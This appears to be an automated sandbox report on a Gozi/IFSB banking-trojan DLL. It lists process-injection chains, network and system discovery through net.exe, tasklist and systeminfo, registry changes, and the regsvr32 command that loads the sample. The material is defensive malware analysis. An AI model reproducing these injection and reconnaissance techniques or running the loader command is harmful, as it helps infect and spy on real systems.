Analysis Overview
SHA256
44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Threat Level: Known bad
The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Suspicious behavior: MapViewOfSection
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Discovers systems in the same network
Suspicious use of WriteProcessMemory
Gathers system information
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-09 12:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-09 12:29
Reported
2022-08-09 12:31
Platform
win7-20220715-en
Max time kernel
48s
Max time network
45s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
Network
Files
memory/1932-54-0x000007FEFC381000-0x000007FEFC383000-memory.dmp
memory/1832-55-0x0000000000000000-mapping.dmp
memory/1832-56-0x0000000076281000-0x0000000076283000-memory.dmp
memory/1832-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1832-63-0x0000000000260000-0x000000000026D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-09 12:29
Reported
2022-08-09 12:31
Platform
win10v2004-20220722-en
Max time kernel
151s
Max time network
154s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1520 set thread context of 1028 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 1716 set thread context of 4028 | N/A | C:\Windows\SysWOW64\regsvr32.exe | C:\Windows\system32\control.exe |
| PID 1028 set thread context of 3520 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1028 set thread context of 3784 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1028 set thread context of 4816 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1028 set thread context of 3256 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 4028 set thread context of 4244 | N/A | C:\Windows\system32\control.exe | C:\Windows\system32\rundll32.exe |
| PID 1028 set thread context of 3240 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c405d5b7-d2cb-4889-97 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = ca73dba6fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a68136a6fcabd8018c087ea6fcabd8018c087ea6fcabd80108e61a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346537393864666536353764613932633663376338666661643535336130626636326261363637376430313930656266336165373161616132333037386635370000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d83e0400340065003700390038006400660065003600350037006400610039003200630036006300370063003800660066006100640035003500330061003000620066003600320062006100360036003700370064003000310039003000650062006600330061006500370031006100610061003200330030003700380066003500370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34653739386466653635376461393263366337633866666164353533613062663632626136363737643031393065626633616537316161613233303738663537000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9485462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9485462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\167bd767-e11a-4694-9b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = 12003ba5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = b8354ba5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = 8c8355a7fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000282b3ca5fcabd801282b3ca5fcabd801282b3ca5fcabd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346537393864666536353764613932633663376338666661643535336130626636326261363637376430313930656266336165373161616132333037386635370000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d83e0400340065003700390038006400660065003600350037006400610039003200630036006300370063003800660066006100640035003500330061003000620066003600320062006100360036003700370064003000310039003000650062006600330061006500370031006100610061003200330030003700380066003500370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34653739386466653635376461393263366337633866666164353533613062663632626136363737643031393065626633616537316161613233303738663537000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff8c85462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff8c85462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0065f893-8090-49d4-8d | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" | C:\Windows\System32\RuntimeBroker.exe | N/A |
